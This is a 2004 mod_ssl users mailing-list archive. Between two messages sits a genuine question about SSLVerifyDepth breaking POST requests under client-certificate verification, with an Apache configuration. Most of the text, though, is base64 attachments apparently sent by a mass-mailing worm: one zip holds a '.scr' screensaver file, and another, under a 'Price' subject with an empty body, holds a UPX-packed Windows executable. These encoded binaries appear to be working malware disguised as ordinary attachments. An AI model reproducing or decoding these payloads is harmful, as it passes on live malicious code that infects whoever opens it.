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
OQAAAE9QAAAAAA==

----------whnsihiylkemrwiyhhjq--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  6 01:19:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E3F88A8966; Sat,  6 Mar 2004 01:19:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from scgis.com (www.scgis.com [68.16.197.35])
	by master.modssl.org (Postfix) with ESMTP id 608C2A893D
	for ; Sat,  6 Mar 2004 01:18:57 +0100 (CET)
Received: from crash ([68.16.197.34])
	by scgis.com (8.12.10/8.12.9) with SMTP id i260ItRb025827
	for ; Fri, 5 Mar 2004 19:18:56 -0500 (EST)
	(envelope-from cdavis@scgis.com)
Message-ID: <00af01c40311$b64f8a90$0301010a@crash>
From: "C Davis" 
To: 
Subject: SSLVerifiyDepth breaks POST ability.
Date: Fri, 5 Mar 2004 19:26:47 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00AC_01C402E7.CD2B89A0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "C Davis" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00AC_01C402E7.CD2B89A0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

 Hi,

 I'm running a 2.0.45 server and trying to verify my client =
certificates. My=20
 applications work well until I try to use 'SSLVerifyDepth' and at that =
point=20
 'POST'ing breaks and my applications fail. My applications do get
 the client cert data passed ok.  CGI apps using 'GET's still work fine.
 Anyone seen this problem before?=20
=20
ScriptAlias /privateapps/ "/usr/local/appdir/privateuse/"



SSLRequireSSL
SSLVerifyClient require
# SSLVerifyDepth  1

SSLOptions +ExportCertData +StdEnvVars +StrictRequire +OptRenegotiate


  Order allow,deny
  Allow from all
  




TIA, Chris
------=_NextPart_000_00AC_01C402E7.CD2B89A0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









 Hi,


 


 I'm running a 2.0.45 server and =
trying to=20
verify my client certificates. My 


 applications work well until I =
try to use=20
'SSLVerifyDepth' and at that point 


 'POST'ing breaks and my =
applications=20
fail. My applications do =
get


 the client cert data passed ok.  CGI apps using 'GET's still =
work=20
fine.


 Anyone seen this problem before?=20



 
ScriptAlias /privateapps/ =
"/usr/local/appdir/privateuse/"


 


<Directory "/usr/local/appdir/privateuse/">


 


SSLRequireSSL
SSLVerifyClient require
# SSLVerifyDepth  =
1


 


SSLOptions +ExportCertData +StdEnvVars +StrictRequire =
+OptRenegotiate



<Limit GET POST OPTIONS>
  Order =
allow,deny
 =20
Allow from all
  </Limit>


 


</Directory>


 


TIA, Chris


------=_NextPart_000_00AC_01C402E7.CD2B89A0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  6 05:00:46 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6A94EA8966; Sat,  6 Mar 2004 05:00:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from primary (rrcs-se-24-129-187-238.biz.rr.com [24.129.187.238])
	by master.modssl.org (Postfix) with SMTP id C3811A893D
	for ; Sat,  6 Mar 2004 05:00:42 +0100 (CET)
Date: Fri, 05 Mar 2004 23:03:53 -0500
To: modssl-users@modssl.org
Subject: Price
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------psmonxsrkcsixqkdvxls"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------psmonxsrkcsixqkdvxls
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit



----------psmonxsrkcsixqkdvxls
Content-Type: application/octet-stream; name="accb.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="cdcab.zip"

UEsDBAoAAAAAAEC4ZTBKH8ydAD4AAAA+AAAMAAAAb2h0ZW5mbmkuZXhlTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4f
ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAADEoj5LgMNQGIDDUBiAw1AYgMNQGIPDUBgO3EMYr8NQGGjcVRiBw1AYfONCGIHD
UBhHxVYYgcNQGFJpY2iAw1AYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwBCRUBA
AAAAAAAAAADgAA8BCwEFDABAAAAAEAAAAHAAALCwAAAAgAAAAMAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAA0AAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAACkwwAAFAEAAADAAACkAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAABwAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAA
AACAAADgVVBYMQAAAAAAQAAAAIAAAAA0AAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAA
